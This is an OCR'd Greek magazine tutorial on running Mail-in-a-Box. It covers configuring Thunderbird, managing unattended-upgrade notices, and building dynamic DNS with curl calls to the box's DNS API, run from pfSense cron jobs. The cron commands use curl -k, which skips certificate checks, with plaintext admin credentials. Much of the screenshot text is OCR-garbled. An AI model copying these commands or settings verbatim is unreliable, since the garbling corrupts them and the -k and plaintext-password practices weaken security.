σχετική εφαρµογή της Google ώστε να διαχειρίζεται *kat* το λογαριασμό µας στο 
colder.xyz. (Προς το παρόν "δεν" υπογράφουµε ψηφιακά κι ούτε κρυπτογραφούμε/ 
αποκρυπτογραφούμε emails από το smartphone.) Παρατηρήστε ra screenshots που 
ακολουθούν και διαβάστε τις αντίστοιχες περιγραφές, ώστε μεταξύ άλλων να δεί- 
τε πώς ρυθµίζουµε ro Thunderbird προκειµένου να συνεργάζεται µε το MiaB. 


eee c τ * ο 


& box.colderyz/admin [9 & | c ΚΒ 


Mobile/desktop apps gets tricked by this. If you are waiting for an email 
from someone new, such as if you are registering on a 
Automatic configuration new website and are waiting for an email confirmation, 


1 x 3 tae í š please give it up to 10-15 minutes to arrive. 
iOS and OS X only: Open this configuration link on your iOS device or on your Mac 


desktop to easily set up mail (IMAP/SMTP), Contacts, and Calendar. Your username *tag addresses 


is your whole email address. 
Every incoming email address also receives mail for 


Manual configuration +tag addresses. If your email address is 
yougyourdomain. com , you'll also automatically get 
mail sent to youcanythingheregyourdomain. com. 
Use this as a fast way to segment incoming mail for 
your own filtering rules without having to create 


Use the following settings when you set up your email on your phone, desktop, or 
other device: 


Option Value aliases in this control panel. 

Protocol/Method IMAP Use only this box to send as you 

Mail server box.colder.xyz Your box sets strict email sending policies for your 
domain names to make it harder for spam and other 

IMAP Port 993 fraudulent mail to claim to be you. Only this machine 
is authorized to send email on behalf of your domain 

IMAP Security SSL names. If you use any other service to send email as 


you, it will likely get spam filtered by recipients. 
SMTP Port 587 


SMTP Security STARTTLS ("always" or "required", if prompted) 


Username: Your whole email address. 


Password: Your mail password. 


Από TO web control panel rou MiaB δίνουμε Mail > Instructions. Στη σελίδα που εμφανί- 
ζεται βρίσκουμε, μεταξύ άλλων, γενικές πληροφορίεςγιατη ρύθμιση ενός οποιουδή- 
ποτε email client, στε να συνεργάζεται µε ro MiaB. Παρατηρήστε ότι: 


* τοπρωτόκολλο για τη λήψη email είναι το IMAP (κι όχι το απαρχαιωμµένο POP) 


* OServer yta ra εισερχόμενα είναι ίδιος µε rov server yta ra e&epxópueva (και στην 
περίπτωσή µας εἰναι o box.colder.xyz) 


* TO port yta Tn λήψη της αλληλογραφίας είναι το 993/TCP κι εκείνο για την απο- 
στολή είναιτο 587/TCP 


* το πρωτόκολλο ασφαλείας για τη λήψη email είναι το SSL, ενώ το αντίστοιχο 
γιατην αποστολή εἰναι το STARTTLS 


* TO username για τη σύνδεση στον mailserver είναι Ἀολόκληρη3 η διεύθυνση 
email 


BB 
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€ Thunderbird E T 67% δα; EB FriJul31 2041 Q im 


e. Ῥοίαηι θη 


EA Get Mossagos = S Adorose Book [7 Writo Would you like a new email address? 

ΠΤ ] š 

ΠΤ Thunderbird Mail-[ Christos Varelas Search 

» E Loca odere 

In partnership with several providers, Thunderbird can offer you a new email account. Just I 


Email 
in your first and last name, or any other words you'd like, in the fields above το get started. 


ικα 


Z wiena anew messa 


Accounts 


View settings fori 


A Ceasa now acco 
)Ema c Che 


Skip this and use my existing emai I think ΠῚ configure my account later 


Advanced Features 


Q}! searen messages 
£, Manage message fiters 


= Manage folder subscriptions 


(7 otras 


JSEMEBLEX VEIT ULLIDERLLU 


Προκειμένου va προσθέσουμε εναν νέο λογαριασμό email oro Thunderbird, ένας τρόπος 
είναι να δώσουμε File > New > Get a New Mail Account. Στο παράθυρο που εμφανίζε- 
ται θα παρατηρήσετε ότι µας προτείνεται v' αποκτήσουμε νέα διεύθυνση email από το 
Gandi. Δεν ενδιαφερόµαστε για κάτι τέτοιο -τουλάχιστον όχι αυτή τη φορά- και θέλου- 
µε µία διεύθυνση από αυτές που έχουµε στο MiaB. Κάνουμε, λοιπόν, éva κλικ στο κουμπί 
Skip this and use my existing email. 


Θ Mail Account Setup 


Your name: subZraw Your name, as shown to others 


Email address: | subzrawQcolder.xyz 


Password: | 


Remember password 


Get a new account Cancel Continue 


Στο νέο παραθυράκι που εμφανίζεται πληκτρολογούμε το ὀνομά µας, µία επιθυμητή δι- 
εύθυνση email που προὐπάρχει oro MiaB, καθώς και ro αντίστοιχο password. Μην ξεχά- 
σετε να τσεκάρετε ro Remember password και πατήστε oro Continue. To Thunderbird 
θα προσπαθήσει να επικοινωνήσει µε rov mailserver, προκειµένου να κάνει τις απαραί- 
τητες ρυθµίσεις αυτόματα. Μην το αφήσετε να προσπαθεί άδικα και κάντε κλικ στο 
κουμπί Manual config. 
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eoo Mail Account Setup 


Your name: subZraw Your name, as shown to others 
Email address: subzraw@colder.xyz 
Password: eeeseeecccococcooooo 


Remember password 


Server hostname Port SSL Authentication 
Incoming: IMAP box.colder.xyz 993 SSL/TLS Normal password 
Outgoing: SMTP | box.colder.xyz 587 STARTTLS Normal password 
Username: incoming: subzrawGcolder.xyz Outgoing: subzrawGcolder.xyz 
„Get a new account| Advanced config | . Cancel __ 


. Re-test Dore K 
" 


Εδώ φροντίζουμε WOTE οι διάφοροι παράμετροι να έχουν τιµές που προτείνονται OTO 
control panel του MiaB. Παρατηρήστε το screenshot και κάντε τις αντίστοιχες επιλογές 
για τα δικά σας email και domain. Μη σας παραξενεύει που για το Authentication έχουµε 
βάλει Normal Password, αφού ο κωδικός θα ταξιδεύει µέσω κρυπτογραφηµεένου Kava- 
λιού. Όταν τελειώσετε µετις ρυθμίσεις πατήστε στο κουμπί Done, κάτω δεξιά. 


59! Y 
Je ColderxyZ N 
» ; 
———— Ew Όλων Β Account Name: ColderxvZ = 
> (à Detant GR Setings Default Identity. 
- i s jes & Fold 
(Ë Colderxyz Thunderbird Mail ες Each account has an identity, which is the information that other people see 
5 inbox postion&Addmssng — when they read your messages. 
oed ; Junk Settings. 
Bee Ἐς. Synchronization & Storage your Name: Christos Varolas 
EI OpenPGP Security 
Ks ον, η Fea Pede Email Address: ο 
F Trash Security Reply-to Address: Recipients will reply to this other address 
aaa Y Local Folders 
- [ff Witea naw mess Jurk Settings Organization: Colder Inc. 
E Spam kae Snatretex: Use HTML (eg. <b>boldb>) 
peus T Outgoing Server (SMTP) γάνος es 
Travel (1) 
> Í Loca Folders : Κρυπτογραφείτε ταχυρά το email σας! 
Ἡ | View settings tort Παρακολουθήστε τα οχετικά video tutorials: 
http: //dettahacker.gr/Rowto-strongly-encrypt-email 
E, Creme a newaco 
Attach the signature from a file instead (text, HTML, or image): 
C Emal ct Choose. 
Attach my vCard to messages. Edt Cara... 
Advanced Features. Outgoing Server (SMTP): subzraw@coklerxyz - box.colderayz (Default) 
IQ} Search messages Manage >K 
A Menage message Account actions ο) i 
Conca 
[| e 
ς Offline settings 
8 


To Thunderbird είναι ρυθµισµενο ώστενα διαχειρίζεται το email του subzraw@colder.xyz. 
Έχουμε μάλιστα φροντίσει να το ενημερώσουμε και για ένα από τα υπάρχοντα aliases 
της συγκεκριμένης διεύθυνσης, συγκεκριµένα για το christosvarelas@colder.xyz, συνε- 
πώς είµαστε σε θέση va στέλνουμε email είτε απὀ το subzraw@colder.xyz είτε από το 
christos.varelas@colder.xyz. Πα να προσθέσουμε ένα alias σε συγκεκριµένο λογαριασμό 
email που γνωρίζει ro Thunderbird, στο αριστερό, κάθετο pane της εφαρμογής κάνουμε 
δεξί κλικ πάνω στο λογαριασμό που µας ενδιαφέρει κι επιλέγουμε το Settings. Στο νέο 
παράθυροπου εμφανίζεται πατάμε oro Manage Identities, κάτω δεξιά. 
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as Meenmes|- 8 r Quse Ἐξ. Όσιο, 
= σα E kd E Φ Christos Varelas <christos.-varelas@colder.xyz> 


> (8 Defiant GR `subzraw <subzrawdcoidarəyz> 
Thunderbird Mail - Colder.XYZ 


Manage the identities for this account. The first identity is used by detaut. - 
L Search... <38K> 


Email 


EA, Poad messages 
zx Write a new message. 


Accounts 


t| | View settings tor this account 


Εὸ Create a new account: 


(Ema chat ο 


Advanced Features. 
[c 
m= Manage message filters. 


[- Mm 


ç Offline settings 


€ Thunderbird 


σας Colder XYZ 


Rá Get Messages > $ Address Book [Z Write — - 


erap 


Recipients will reply to this other address 


Colder Inc. 
Use HTML (e.g., <b>bold</b>) 
Κρυπτογραφείτε ισχυρά to email σας! 


t τα σχετικά video tutorials: 
http: //deltahacker.gr/howto-strongly-encrypt-email 


pppppa 


Attach the signature from a fe instead (text, HTML, or image): 


Attach my vCard to messages. 


Outgoing Server(SMTP) | subzrawücolderxyz - box colderxyz (Default) 


g1 
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Q Search... ctio = 


fe Repy (e RepyAn|- | => Forward T Archive Ο) Delete More" 


7/29/15, 06:47 


105565 files and directories currently installed.) 
4 ondó4.deb ... 


15: dfsg-Jubuntuó, 3) 
buntue, 4 and64. deb 
9.5.4fsg-3ubuntu0,3) ... 


ndGA.deb ,., 
fsg-3ubuntuo. 3) 


ubuntu1) 


999 /u  sysm-codvz | 
Get Messages > S Address Book [Z Wrte 2 Man 7” E Archve © Delte [Y Quick Fiter 
rae J^: 9Umend Ἀθιπποά Contact Tags ÜAtachment Q Filter these messages... «ΟΦ». 
ρα ν΄ Subject Fom Die v 8 
ΤΠ ofa [box.colderxyz] Status Checks Change Notice box.coiderxyz 06:47 
vom root «ποοἰθδοκ older) 
^E [box.coldorayz) Status Checks Change Notice bok.colderxyz sans, Μη coal eR md 
creas [box cor yz) Status Checks Charge Notice boxccoiderayz 92/5, 0828 || 9«biect unattended-upgredes result for box.cokderayz 
ος [box.colderxyz] Status Checks Change Notice box.coldecxyz ΦΥ, 0044 το talk2usQrcokderxyr t 
[box oolderxyz] Status Checks Change Notice boxcolderxyz T//15,06.. 
Trash " 
Li 5 Test coke id BEN CORN CRGO Foral νά Unattended upgrade returned: True 
ms [νοκ colder. xyz] Status Checks Cha Packages that vere upgraded: 
ë bind9 bind9-host bind9utils dnsutils libbind9-90 libdns100 libisc95 
a Sem [pox.coldorxy] Status Checks Charge Notico box colder ayz libisccc90 libisccfq90 liblwres90 
Y= [box.oolderxyz] Status Checks Change Notice box.colderxyz Package installation lagi 
> [| Local Folders [box coiderxyz] Status Chocks Change Notice box coidorxyz Preconfiguring packages ... 
; οθοοὶτοφυτασ unattended-upgrados result for 'box οοἰάϑτχγα' Tuo — root (Reading database 
vrartended-upgrades rest tor `box coder , mot Preparing to unpac 
: Inpacking bin Ἡ 
ον OH NH Ete Preparing to unpack .,./bindS-host, 183a9.9.5.dfsg 
[box.ooldorxyz] Status Chocke Charge Noli box coidorayz Unpacking bindS-host (1:9.9.5.dfsg-3ubuntuó.4) over 
vrantended-upgrades ost tor box coder root Preparing to unpack , 5. 
[bx .ooldorxyz) Status Checks Change Noti  box.colderxyz 7/8/15, 06:6 || Unpacking dnsutils (1: 
unattendod-upgrades result for 'box colder. root mans, 08:35 || Preparing to unpack , 
Unpacking libisc95 (i 
[box coiderxyz] Status Chocks Change Notico boxcoldorxyz PR00788 to Ulpack ; 
[reboot required] unattendec-upgrades result for 'box.coldorxyz': Tue — root Unpacking libisccc99 
Ibox.coldorayz] Status Chocks Chango Notíco box.coldorxyz Preparing to unpack . 
 unattended-upgrades result for 'box colder root Unpacking libisccfg90 
—— αι Change Noti αμα. Preparing to unpack . blwres90_1%3a9.9.5.dfsg-3ubuni 
[box.ooldor.xyz] Statua Chocka Change Notioo boxooidorxyz Unpacking liblvres90 (1:9.9.5.dfsg-3ubuntu@.4) over (1: 
vrattended-upgrades result for box colderayz'; "rue" mot Preparing to unpack + 
F Unpacking libdns100 (1:9.9.5.df 
Pox coiderayz] Status Chocks Charge Notico "E ούκος ASE Monts ( 
(reboot required] unattended-upgrades result for'bokcolderxyr:Tue — root Unpackind bindiutils 
(reboot required] unattendad-upgrades result for 'box.colderxyz': True — root Preparing to unpack . 
[vox.colderxyz] Status Checks Change Notice box coiderayz Unpacking libbind9-90 
(reboot required] unattended-upgrades result for 'box.coiderxyz': Tue — root μα 
= Processing triggers for ufw (0.34=rc-0ubuntu2) 
busca Saha Cacka Cherie Moto, [E ΦΙΑ/ΙΦ.08.. | Processing triggers for ureadahead (0.100.0-16) . 
[reboot required] unattended-upgrades result for 'box.colderxyz: Trua — root 8/12/5,08.. | Processing triggers for man-db (2.6.7.1- 
[box.oolderxyz] Status Checka Charge Notice bok.colderayz 91/5,00.. | Setting up libisc95 (1:9.9.5.dfsg-3ubuntub.4) . 
(reboot required] unattendec-upgrades resutor'boxcolderxyz:Tue — root ΦΗ1/8,08.. | Setting up libdns180 (1:9.9.5.dfsg-3ubuntub.4) ... 
ο ο οσα ο wars oea | Setting up libisccc99 ( dfsg-3ubuntu9.4) ` 
aya x Setting up libisccfg90 . dfg-3ubuntue. 4) 
Activity notification ownCioud ΦΤΗ5, 19:41 || Setting up LibbindS-90 sg-3ubuntu0.4) 
Aotiatanatiention, μμ” armis szoa | cnttinn un lihlurarna 11:0. Q & ifen μικρα. A) 


Unread;0 — Tota: 42 


Χάρη σε κανόνα που έχουµε ορίσει µέσα από To Roundcube, τα emails που αφορούν στο 
λειτουργικό σύστημα του VPS, καθώς κι εκείνα που αφορούν σε ελέγχους του MIaB, 
καταλήγουν στο φάκελο ονόματι System. To επιλεγμένο μήνυμα έχει αποσταλεί απότην 
υπηρεσία των unattended upgrades του Ubuntu Server και προοριζόταν για το λογαρια- 
σμὀ talk2us@colder.xyz. Έχουμε όµως ήδη καθορίσει, µέσω rou control panel rou MiaB, 
ότι όσα emails πηγαίνουν στο talk2us@colder.xyz θα καταλήγουν τελικά στο subzraw@ 
colder.xyz. Γενικά αποφεύγουμε να καθορίζουμε κανόνες µέσα από rov email client και 
προτιμούμε να τους συντάσσουµε κεντρικά, εν προκειμένω µέσα από ro Roundcube. 
Έτσι, η επιθυμητή οργάνωση των emails θα αντικατοπτρίζεται σε κάθε email client του 


MiaB. 
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Modified 


// This option allows you to control if on a unclean dpkg exit 
// unattended-upgrades will automatically run 

// dpkg —force-confold —configure -a 

// The default is true, to ensure updates keep getting installed 
//Unattended-Upgrade: :AutoFixInterruptedDpkg "false"; 


// Split the upgrade into the smallest possible chunks so that 

// they can be interrupted with SIGUSR1. This makes the upgrade 

// a bit slower but it has the benefit that shutdown while a upgrade 
// is running is possible (with a small delay) 

//Unattended-Upgrade: :MinimalSteps "true"; 


// Install all unattended-upgrades when the machine is shuting down 
// instead of doing it in the background while the machine is running 
// This will (obviously) make shutdown slower 

//Unattended-Upgrade: :InstallOnShutdown "true"; 


// Send email to this address for problems or packages upgrades 

// If empty or unset then no email is sent, make sure that you 

// have a working mail setup on your system. A package that provides 
// 'mailx' must be installed. E.g. "usergexample. cor 
sflnattended-Upgrade: :Mail "talk2usgcolder.xyz"; 


// Set this value to "true" to get emails only on errors. Default 
// is to always send a mail if Unattended-Upgrade::Mail is set 
//Unattended-Upgrade: :MailOnlyOnError "true"; 


// Do automatic removal of new unused dependencies after the upgrade 
// (equivalent to apt-get autoremove) 
//Unattended-Upgrade: : Remove-Unused-Dependencies "false"; 
Get Help t WriteOut à Read File Prev Page K Cut Text 
( Exit Justify δν Where Is Next Page UnCut Text 


Ms Cur Pos 
Mi To Spell 


Πρακτική χρήση του Mail-In-a-Box και κόλπα 


Εκτός από την υπηρεσία unattended upgrades του Ubuntu, μηνύματα περί õa- 
θέσιµων αναβαθµίσεων στέλνει και το ίδιο το MiaB. Αργήσαμε λίγο να το συ- 
γειδητοποιήσουμε, όταν όµως καταλάβαμε τι συμβαίνει συνδεθήκαμε oro VPS 
μέσω SSH, ανοίξαμε το αρχείο /etc/apt/apt.conf.d/50unattended-upgrades pe ro 
nano, σχολιάσαμε την εικονιζόµενη γραμμή, αποθηκεύσαμε την αλλαγή κι αφού 
εγκαταλείψαµμε τον editor επανεκκινήσαµε τη σχετική υπηρεσία rou λειτουρ- 
γικού συστήµατος. 


£ «) A 10% gm TueAug4 1618 Q = 


e/a Coiderxvz 
FEGetMessages|- $ Address Book [Z write = 
1 tive jui mai controls for this a 
TEE z ; junk mai control for this account 
Y (Ë Colder XYZ Thunderbird Mail - st train Thunderbird to identify junk mail by using the 
Inbox messages as junk or not. You need to identify both 
Si ` Ato that Thunderbird wit bo able to mark junk. 
Email 
[E] Sent 
Tob Archives 
Š [F Read messages 
Cms a 
E Tan 
[0 Νομοί 7 Write a new mese. M 
Pen Z 
Ë Spam 
— System Accounts 
Ὦ me Trust junk mail headers set by: SpamAssassin 
> BÀ Loca Folders 
View settings tor | M erabiod, Tnunderbird wil automaticaly consider massages marked by tha 
entermal lasoifor a junk. 
EL 
O twi wa 
Advanced Features 
(Qi Soarch messages 
Gobal Junk Preferences. 
É Menage message p B 
Εμ. οἱ ] 
[| νοκοίσόκαι 


ç Offino settings 


TIMNELIX KITI LYTIPITITTTT LET) 


Προς το παρόν προτιµάµε να µη χρησιμοποιούμε ro Junk filter Tou Thunderbird αλλά va 
εκπαιδεύουµε -όποτε χρειάζεται- τον SpamAssassin του MiaB. Ακριβώς γι αυτό δεν 
έχουµε τσεκαρισµένη τη σχετική επιλογή για το λογαριασμό email που διαχειρίζεται το 
Thunderbird. 


To DNS API και To dynamic DNS 


Όπως πρέπεινα έχουµεπει καμιά 70pta φορές έως τώρα, το MiaB υλοποιεί τον δικό 
του DNS server. Πα τον end-user, μάλιστα, δηλαδή για εμάς, παρέχεται ένα API ώστε 
να διαχειριζόµαστετον name server xu)píc vacuvógópaore oro VPS ή oro web control 
panel του MiaB. Μια άµεση εφαρµογή της παρουσίας API είναι η παροχή υπηρεσιών 
dynamic DNS για τις συσκευές µας. Είναι ἐτσι δυνατό να αντιστοιχίσουμε, π.χ., O' 
VAV οικιακό server, κάποιο όνομα της µορφής theserver.colder.xyz, WOTE να φτάνου- 
µε σε δημόσιες υπηρεσίες του μηχανήματος χωρίς va γνωρίζουμε τη δημόσια διεύ- 
θυνση ΙΡ που έχει ο router μπροστά από το μηχάνημα. Κι επειδή η προαναφερθείσα 
διεύθυνση ενδέχεται ν αλλάζει, χάρη στο DNS API του MiaB είναι εύκολο να avave- 
ώνουμε την αντιστοίχιση theserver.colder.xyz 9 δημόσιο. ΙΡ περιοδικά κι αυτόματα, 
TLX., UE τη βοήθεια ενός cronjob. Ακόμα καλύτερα θα ήταν να δώσουμε ένα hostname 
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στο δημόσιο interface rou router. Av η συσκευή διαθέτει κάποιο Open Source firmware 
(OpenWrt, dd-wrt) oro οποίο έχουµε πλήρη πρόσβαση, τότε εύκολα πετυχαίνουμε 
το σκοπό µας. Το ίδιο ισχύει κι αν o router τρέχει κάποιο λειτουργικό σύστηµα σαν 
το pfSense, όπως ισχύει µε τον δικό µας (http://deltahacker.gr/deltacast-s01e07). 
Στα screenshots που ακολουθούν δείχνουμε πρώτα πώς υλοποιούμε υπηρεσίες 
dynamic DNS µέσω rou API, για ένα μεμονωμένο μηχάνημα. Συνεχίζουμε µετις ρυθ- 
μίσεις για τον pfSense-based router µας, woTe στα δύο public interfaces που έχει va 
αντιστοιχίζονται δύο διαφορετικά hostnames της µορφής kárt.colder.xyz. 


eoe <> ἢ * ο = Â box.colder.xyz/admin e ἣ m m" 


Custom DNS API 


Use your box's DNS API to set custom DNS records on domains hosted here. For instance, you can create your own dynamic DNS service. 
Usage: 

curl -X VERB [-4 "value"] —user {email}:{password} https://box.colder.xyz/admin/dns/custom[/qname [/rtypel] 
(Brackets denote an optional argument.) 


Verbs 


Verb Usage 


GET Returns matching custom DNS records as a JSON array of objects. Each object has the keys qname, rtype , and value . The optional 
qname and rtype parameters in the request URL filter the records returned in the response. The request body ( -d "...") must be 
omitted. 

PUT Sets a custom DNS record replacing any existing records with the same qname and rtype . Use PUT (instead of POST) when you only 


have one value for a qname and rtype, such as typical A records (without round-robin). 


POST Adds a new custom DNS record. Use POST when you have multiple TXT records or round-robin A records. (PUT would delete 
previously added records.) 


DELETE Deletes custom DNS records. If the request body ( -d "...") is empty or omitted, deletes all records matching the qname and rtype. 
If the request body is present, deletes only the record matching the qname, rtype and value. 


Parameters 


Parameter Value 
email The email address of any administrative user here. 


password That user's password. 


Στο web control panel rou MiaB, kat συγκεκριµένα στη σελίδα που εµφανίζεται επιλέγο- 
vrac System > Custom DNS, υπάρχει η ενότητα ονόματι Custom DNS API. Παρατηρήστε 
ότι για Tn λήψη, την προσθήκη ñ τη διαγραφή DNS records χρησιμοποιείται το εργαλείο 
curl, το οποίο είναι διαθέσιμο για Linux, BSD, OS X και Windows. 
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box.colder.xyz/admin e t m [+ 


Log out? 


rtype The resource type. Defaults to A if omitted. Possible values: A (an IPv4 address), AAAA (an IPv6 address), TXT (a text string), 
CNAME (an alias, which is a fully qualified domain name — don't forget the final period), MX , or SRV . 


value For PUT, POST, and DELETE, the record's value. If the rtype is A or AAAA and value is empty or omitted, the IPv4 or IPv6 
address of the remote host is used (be sure to use the —4 or -6 options to curl). This is handy for dynamic DNS! 
Strict SPF and DMARC records will be added to all custom domains unless you override them. 


Examples: 


Try these examples. For simplicity the examples omit the —user me@mydomain.com:yourpassword command line argument which you must fill in 
with your email address and password. 


# sets laptop.mydomain.com to point to the IP address of the machine you are executing curl on 
curl -X PUT https://box.colder.xyz/admin/dns/custom/laptop.mydomain.com 


# deletes that record and all A records for that domain name 
curl -X DELETE https://box.colder.xyz/admin/dns/custom/laptop.mydomain.com 


# sets a CNAME alias 
curl -X PUT -d "bar.mydomain.com." https://box.colder.xyz/admin/dns/custom/foo.mydomain.com/cname 


# deletes that CNAME and all CNAME records for that domain name 
curl -X DELETE https: //box. colder.xyz/admin/dns/custom/foo.mydomain.com/cname 


34 adds a TXT record using POST to preserve any previous TXT records 
curl -X POST -d "some text here" https://box.colder.xyz/admin/dns/custom/foo.mydomain.com/txt 


# deletes that one TXT record while preserving other TXT records 
curl -X DELETE -d "some text here" https://box.colder.xyz/admin/dns/custom/foo.mydomain.com/txt 


This is a Mail-in-a-Box. 


Λίγοπιο κάτω στην ἰδια σελίδα παρατίθενται µερικά παραδείγματα χρήσης rou DNS API, 
µέσω TOU Curl. Το πρώτο παράδειγµα αφορά oro dynamic DNS για éva laptop. Πα οικο- 
νομία χώρου από όλα τα παραδείγματα έχει παραλειφθεί η παράμετρος -user, n οποία 
ακολουθείται απὀ το email και το password του διαχειριστή του MiaB. Δείτε το επόμενο 
screenshot για ένα πληρέστερο παράδειγµα. 


959 ^? cvar — bash — 140x25 
bash ar 


MBPr15:^ cvar$ 

MBPr15:^ cvar$ curl ifcontig.ne e 

79.131.9. 

EUN 2 cur -X PUT https://box.colder.xyz/admin/dns/custom/mbpr15.colder.xyz —user 'talk2usQcolder.xyz':'6 
updated * colder.xyz 


MBPr15:^ cvar$ 
MBPri5:^ cvar$ ping -c 5 nopras, cotder. y: e 
PING mbpr15.colder.xyz (79.131.94.102): 56 da ytes 

64 bytes from 79.131.94.102: icmp seq-0 ttl-64 time-7.539 ms 
64 bytes from 79.131.94.102: icmp seq-1 ttl-64 time-7.757 ms 
64 bytes from 79.131.94.102: icmp seq-2 ttl-64 time-7.777 ms 
64 bytes from 79.131.94.102: icmp seq-3 ttl-64 time-7.704 ms 
64 bytes from 79.131.94.102: icmp seq-4 ttl-64 time-5.242 ms 
--- mbpri5.colder.xyz ping statistics — 

5 packets transmitted, 5 packets received, 0.0% packet loss 
round-trip min/avg/max/stddev = 5.242/7.204/7.777/0.984 ms 
MBPr15:^ cvar$ Ἡ 


Από το τερματικό ενός μηχανήματος µε OS X χρησιμοποιούμε ro curl ώστε να βρού- 
µε το δημόσιο IP µε το οποίο βγαίνουµε oro Internet (1). Στο παράδειγμά µας είναι το 
79.131.94.102. Στη συνέχεια χρησιμοποιούμε και πάλι το curl, προκειμένου να θέσουμε 
ένα νέο A-record στον DNS server του MiaB (2). Ουσιαστικά, λέμε ότι το IP του mbpr15. 
colder.xyz είναι το 79.131.94.102. Πα να επαληθεύσουμε ότι η αντιστοίχιση επετεύχθη, 
κάνουμε ένα ping στο mbpr15.colder.xyz (3). Παίρνουμε απαντήσεις από το μηχάνημα µε 
IP ro 79.131.94.102, συνεπώς όλα έχουν πάει καλά. 
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Custom DNS 


This is an advanced configuration page. 


It is possible to set custom DNS records on domains hosted here. 


Set Custom DNS Records 


YYou can set additional DNS records, such as if you have a website running on another server, to add DKIM records for external mail providers, or for 
various confirmation-of-ownership tests. 


Name subdomain . |colderxyz $ 
Leave the left field blank to set a record on the chosen domain name, or enter a subdomain. 
Type A(Iv4 address) 


Value 


Enter an IPv4 address (i.e. a dotted quad, such as 123.456.789.012). 


Set Record 


Domain Name Record Type Value 
otenetcolderxyz A 87.203.192.169 [delete] 
hon.colder.xyz A 37.98.9328 [delete] 


mbpr15.colderxyz A 79.131.94.102 — [delete] 


To πλαισιωμενο είναι το A-record που μόλις θέσαµε, όπως φαίνεται µέσα από ro control 
panel του MiaB. Τα δύο πρώτα αντιστοιχούν στις δύο δημόσιες διευθύνσεις IP που έχει 
o pfSense-based router µας, ο οποίος βγαίνει oro Internet µέσω δύο διαφορετικών Ypap- 
uwv (άλλοτε σε διάταξη load balancing κι άλλοτε σε διάταξη fail-over — δείτε περισσότε- 
ρα στο σχετικό άρθρο του τεύχους 029, http://deltahacker.gr/deltahacker029). 


eoe < m * ο & pfsense/pkg mor installed.php. [d ^o uum 


> System — Interfaces — » Firewall s  *VPN Status » Diagnostics » Gold — » Help 


System: Package Manager 


"Available Packages [BUS T Packages 


To pfSense παρέχει υποστήριξη dynamic DNS και είναι σε θέση va επικοινωνεί µε τις 
σχετικές υπηρεσίες εταιρειών όπως dyn.com, noip.com Kt ένα σωρό άλλες. Αρκετές εξ 
αυτών είναι επίπληρωμµή,ορισμένες παρέχονται δωρεάν αλλά µε περιορισμούς. ATÓ TN 
στιγµή βέβαια που έχουµε τον δικό µας DNS server και μπορούμε να rov τροποποιούμε 
απομακρυσμένα μέσω ΑΡΙ, πραγματικά δεν έχουµε κανέναν λόγογιαν' απασχολούμαστε 
ue rtc υπηρεσίες dynamic DNS τρίτων. Αντί λοιπόν να καταφύγουμε στον ενσωµατωμµέ- 
vo μηχανισμό rou pfSense για την υποστήριξη dynamic DNS, θα εγκαταστήσουµε στον 
router µας ro cron και σε τακτά χρονικά διαστήματα, π.χ. κάθε µία wpa, θα ενηµερώνου- 
µε αυτόματα rov DNS server rou MiaB μέσω rou curl, λέγοντάς του, π.χ., ότι το therouter. 
colder.xyz 6εχειτην τάδε δημόσια διεύθυνση IP, n οποία έχει αποδοθεί από τον ISP µας και 
είναι αυτή µε την οποία βγαίνουµε oro Internet. Στο screenshot φαίνεται ότι έχουµε ήδη 
εγκαταστήσει το πακέτο ονόματι Cron (το βρήκαμε στο System > Packages > Available 
Packages > Services). 


86 


Πρακτική χρήση του Mail-In-a-Box και κόλπα 


Status: Dashboard 
aug 


System Information 
Name pfsense.parabing.net. 100baseTX «full-duplex» 


Version 2.2.4-RELEASE (amd64) 192.168.1.2 
built on Sat Jul 


(ar 
25 19:57:37 CDT 2015 


FreeBSD 10.1-RELEASE-p15 1000baseT <full-duplex> 


10.10.0.254 
100baseTX <full-duplex> 


You are on the latest version. 
pfSense 

Genuine Intel(R) CPU 2140 @ 1.60GHz 
2 CPUs: 1 package(s) x 2 core(s) 10.10.10.254 
10 Days 04 Hours 33 Minutes 42 Seconds 100baseTX <full-duplex> 
37.98.193.28 


Thu Aug 6 21:07:11 EEST 2015 


127.0.0.1 
46.101.173.140 
8.8.8.8 


Thu Jul 30 18:46:54 EEST 2015 


0% (133/329000) 
Show states 


An 
1196 (3040/26584) 


43.056 


0.00, 0.03, 0.00. 
- 


9% 


a 
7% of 3291 MB 


0% of 8192 MB 


/ (ufs): 8% of 7.7G 


[usr (ufs): 1% of 41G 


H υπηρεσία Cron ενεργοποιείται αυτόματα, αµέσως µετά TNV εγκατάσταση TOU ομώνυ- 
μου πακέτου. Θέλουμε να προσθέσουμε δύο νέα cronjobs, éva για κάθε public interface 
που έχει ο router µας. Προς τούτο, δίνουμε Services > Cron > Edit. 


959 < m * ο & ptsense/packages/cron/cron.php © tio.m 


Cron: Settings 
sesings fT 


Cron controls the scheduling of commands. 
For more information see: http://www freebsd.org/doc/en/books/handbook/configtuning-cron.html. 


im jos ° 3 . fustfbin/nice -n20 adikemtz -a 
[usr[bin/nice -n20 /etc/rc.update bogons.sh 
Jusribinfrice -n20 /usflocal/sbin/expiretable -v -t 3600 sshlockout. 
[usr[bin/nice -n20 /usr/local/sbin/expiretable -v -t 3600 virusprot. 
| fusfbin/nice -n20 Jetcrc-update urtables 
| fuscoinfper Jusr/pbi/ightsquid-amd64/www/ligntsquiq/lightparser-pl today 
usr /bin/perl /usr/pbi/lightsquid-amd64/www(/lightsquid/lightparser.pl yesterday 
| Justfbin/nice -n20 Just/local/sbin/expiretable -v -t 3600 webConfiguratorlockout 


rface τεῦ --user talk2us@colder.xyz:' 

| :/[box.coiderxyz/admin/dns/custom/ 
Cori -k --interface re2 -user talk2us@colderxyz: 

X PUT https://box.colderxyz/admin/dns/custom/hcn.colderxyz 


à alaaaasddd 


Έχουμε προσθέσει ra δύο νέα cronjobs που χρειαζόμαστε. Συγκεκριµένα: µε δικαιώμα- 
Tq root kat ue τη βοήθειατου curl, ro πέμπτο λεπτό κάθε δεύτερης ώρας ενημερώνουμε 
τον DNS server του MiaB για ro δημόσιο IP rou interface τοῦ, το οποίο έχει hostname το 
otenet.colder.xyz. Επίσης, το δέκατο λεπτό κάθε δεύτερης ώρας ενημερώνουμε rov DNS 
server TOU MiaB για ro δημόσιο ΙΡ rou interface re2, το οποίο έχει hostname ro hcn.colder. 
xyz. Παρατηρήστε τη χρήση της παραμέτρου -k kat στις δύο περιπτωσεις: Είναι απαραί- 
τητη ώστε το curl να πραγματοποιεί συνδέσεις HT TPS ακόµη κι όταν το πιστοποιητικό 
TOU απομακρυσμένου μηχανήματος είναι self-signed. Δείτε, τέλος, ότι το password To 
περικλείουµε σε απλά εισαγωγικά. 
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959 7 cvar — ssh — 110x35 
